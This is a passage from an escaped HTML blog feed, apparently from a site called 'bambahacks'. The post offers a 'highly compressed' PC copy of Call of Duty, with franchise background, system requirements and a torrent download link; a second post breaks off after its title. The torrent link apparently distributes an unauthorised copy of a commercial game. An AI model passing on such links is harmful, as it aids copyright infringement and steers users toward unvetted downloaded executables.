&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: medium;"&gt;CALL OF DUTY PC Game (Highly Compressed)&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
&lt;i&gt;Friends Here I Giving You CALL OF DUTY&amp;nbsp;&lt;/i&gt;&lt;i&gt;For PC This Is Ripped Or Compressed Hope You Like It&amp;nbsp;&lt;/i&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1JYnueclrUMxeLtVYSMh8O8YLlJ3FlnRgMFPFd41DWZuel2YvGewg134JdPeSEHtrJhhv11klSkDPnsxYBz7YVrzz8jHB4EVhHoV0Al7lZMgYoQjQQQzoSe7PjENPhMWXVv_Gjy_xEWto/s1600/ulasronaldinhocllss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1JYnueclrUMxeLtVYSMh8O8YLlJ3FlnRgMFPFd41DWZuel2YvGewg134JdPeSEHtrJhhv11klSkDPnsxYBz7YVrzz8jHB4EVhHoV0Al7lZMgYoQjQQQzoSe7PjENPhMWXVv_Gjy_xEWto/s320/ulasronaldinhocllss.jpg" width="223" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;Call of Duty&lt;/b&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;is a&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/First-person_shooter" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="First-person shooter"&gt;first-person&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Third-person_shooter" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Third-person shooter"&gt;third-person shooter&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;computer/&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Video_game" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Video game"&gt;video game&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Media_franchise" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Media franchise"&gt;franchise&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;. The series began on the&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Personal_computer" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Personal computer"&gt;PC&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, and later expanded to&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Video_game_console" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Video game console"&gt;consoles&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;and&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Handheld_game_console" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Handheld game console"&gt;handhelds&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;. Several&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Spin-off_%28media%29" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Spin-off (media)"&gt;spin-off&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;games have also been released. The earlier games in the series are set primarily in&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/World_War_II" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="World War II"&gt;World War II&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, including&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty_%28video_game%29" style="color: #c7000e; text-decoration: none;" title="Call of Duty (video game)"&gt;Call of Duty&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty_2" style="color: #c7000e; text-decoration: none;" title="Call of Duty 2"&gt;Call of Duty 2&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, and&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty_3" style="color: #c7000e; text-decoration: none;" title="Call of Duty 3"&gt;Call of Duty 3&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;. Beginning with&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty_4:_Modern_Warfare" style="color: #c7000e; text-decoration: none;" title="Call of Duty 4: Modern Warfare"&gt;Modern Warfare&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, which is set in modern times, the series has shifted focus away from World War II.&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;Call of Duty 4: Modern Warfare&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;(released November 2007) was followed by&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty:_World_at_War" style="color: #c7000e; text-decoration: none;" title="Call of Duty: World at War"&gt;Call of Duty: World at War&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_2" style="color: #c7000e; text-decoration: none;" title="Call of Duty: Modern Warfare 2"&gt;Call of Duty: Modern Warfare 2&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;.&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty:_Black_Ops" style="color: #c7000e; text-decoration: none;" title="Call of Duty: Black Ops"&gt;Black Ops&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;(released November 2010) takes place in the&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Cold_War" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Cold War"&gt;Cold War&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, while&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_3" style="color: #c7000e; text-decoration: none;" title="Call of Duty: Modern Warfare 3"&gt;Modern Warfare 3&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;(released November 2011) takes place in the near-future setting.&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Call_of_Duty:_Black_Ops_2" style="color: #c7000e; text-decoration: none;" title="Call of Duty: Black Ops 2"&gt;Black Ops 2&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;(released November 2012) takes place in the year 2025.&lt;/span&gt;&lt;/div&gt;
&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;The&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;Call of Duty&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;games are published and owned by&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Activision" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Activision"&gt;Activision&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;. While the studio&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Infinity_Ward" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Infinity Ward"&gt;Infinity Ward&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;primarily still develops them,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Treyarch" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Treyarch"&gt;Treyarch&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;has also developed several of the titles with the release of the studios' games interlaced with each other. Some games have been developed by&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Gray_Matter_Interactive" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Gray Matter Interactive"&gt;Gray Matter Interactive&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Nokia" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Nokia"&gt;Nokia&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Exakt_Entertainment" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Exakt Entertainment"&gt;Exakt Entertainment&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Spark_Unlimited" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Spark Unlimited"&gt;Spark Unlimited&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Amaze_Entertainment" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Amaze Entertainment"&gt;Amaze Entertainment&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/N-Space" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="N-Space"&gt;n-Space&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Aspyr" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Aspyr"&gt;Aspyr&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Rebellion_Developments" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Rebellion Developments"&gt;Rebellion Developments&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Ideaworks_Game_Studio" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Ideaworks Game Studio"&gt;Ideaworks Game Studio&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Sledgehammer_Games" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Sledgehammer Games"&gt;Sledgehammer Games&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;and&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/NStigate_Games" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="NStigate Games"&gt;nStigate Games&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;. The games use a variety of&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Game_engine" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Game engine"&gt;engines&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, including the&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Id_Tech_3" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Id Tech 3"&gt;id Tech 3&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, the Treyarch NGL, and the IW 5.0. Other products in the franchise include a line of&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Action_figure" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Action figure"&gt;action figures&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;designed by Plan-B Toys, a&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Card_game" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Card game"&gt;card game&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;created by&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Upper_Deck_Company" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Upper Deck Company"&gt;Upper Deck&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;, and a&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Comic_book" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="Comic book"&gt;comic book&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;mini-series published by&amp;nbsp;&lt;/span&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/WildStorm_Productions" style="background-color: black; color: #c7000e; font-family: cursive; font-size: 15px; line-height: 20px; text-decoration: none;" title="WildStorm Productions"&gt;WildStorm&lt;/a&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;. As of November 11, 2011, the&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;Call of Duty&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;series has sold over 100 million copies.&lt;/span&gt;&lt;sup class="reference" id="cite_ref-1" style="background-color: black; color: #c9c9c9; font-family: cursive;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty#cite_note-1" style="color: #c7000e; text-decoration: none;"&gt;[1]&lt;/a&gt;&lt;/sup&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;As of March 31, 2012 there are 40 million monthly active players across all of the&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;Call of Duty&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;titles, with 10 million&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Call_of_Duty:_Elite" style="color: #c7000e; text-decoration: none;" title="Call of Duty: Elite"&gt;Call of Duty: Elite&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;users and 2 million paying annual members. Over 1.6 billion hours of online gameplay have been logged&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Modern_Warfare_3" style="color: #c7000e; text-decoration: none;" title="Modern Warfare 3"&gt;Modern Warfare 3&lt;/a&gt;&lt;/i&gt;&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&amp;nbsp;since its 2011 release.&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; text-decoration: underline;"&gt;&lt;b style="outline: none;"&gt;System Requirements:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;Minimum System Requirements&lt;/i&gt;&lt;br /&gt;
System: Pentium 4 1.5GHz or Athlon XP or equivalent&lt;br /&gt;
RAM: 512 MB&lt;br /&gt;
Hard Drive Space: 5000 MB&lt;br /&gt;
Other: GeForce FX or ATI Radeon 9500 - DVD ROM drive&lt;/div&gt;
&lt;div class="textcontent" id="desc" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none; padding-bottom: 20px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;Recommended System Requirements&lt;/i&gt;&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;&lt;table class="font12px" style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; outline: none;"&gt;&lt;tbody style="outline: none;"&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;CPU&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Intel Pentium 4 or AMD Athlon XP Processor&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;RAM&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;384MB of RAM (the more the better!)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;VGA&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;128MB (or greater) Video Card (Geforce 6 Series Recommended)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;DX&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DirectX 9&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;OS&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Windows 2000 or Windows XP&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;HDD&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;4.7GB of free hard disk space (full install)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Sound&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;DirectX 9 compatible Sound Card (Sound Blaster Auidgy 2 Recommended)&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;ODD&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;16-Speed DVD-ROM drive&lt;/td&gt;&lt;/tr&gt;
&lt;tr style="outline: none;"&gt;&lt;td style="outline: none;"&gt;&lt;b style="outline: none;"&gt;Recommended peripheral&lt;/b&gt;:&lt;/td&gt;&lt;td style="outline: none;"&gt;Keyboard &amp;amp; Mouse Gamepad with twin axis analog controls&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;TO DOWNLOAD THIS GAME YOU HAVE TO INSTALL BIT TORRENT TO YOUR PC&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;DOWNLOAD LINK IS BELOW&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"&gt;
&lt;i style="color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;&lt;a href="http://torcache.net/torrent/CEA231DA4B597C2E7FD3DF97598B79256524C0EB.torrent?title=[kickass.to]call.of.duty.2003.full.pc.game.highly.compressed.uploaded.cynar" target="_blank"&gt;CALL OF DUTY &lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="background-color: black; color: #c9c9c9; font-family: cursive; font-size: 15px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1JYnueclrUMxeLtVYSMh8O8YLlJ3FlnRgMFPFd41DWZuel2YvGewg134JdPeSEHtrJhhv11klSkDPnsxYBz7YVrzz8jHB4EVhHoV0Al7lZMgYoQjQQQzoSe7PjENPhMWXVv_Gjy_xEWto/s72-c/ulasronaldinhocllss.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Jucied PC Game</title><link>http://bambahacks.blogspot.com/2013/11/jucied-pc-game.html</link><category>PC Game</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 18 Nov 2013 19:36:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-8783933486607611293</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: medium;"&gt;Jucied PC Game (Highly Compressed)&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
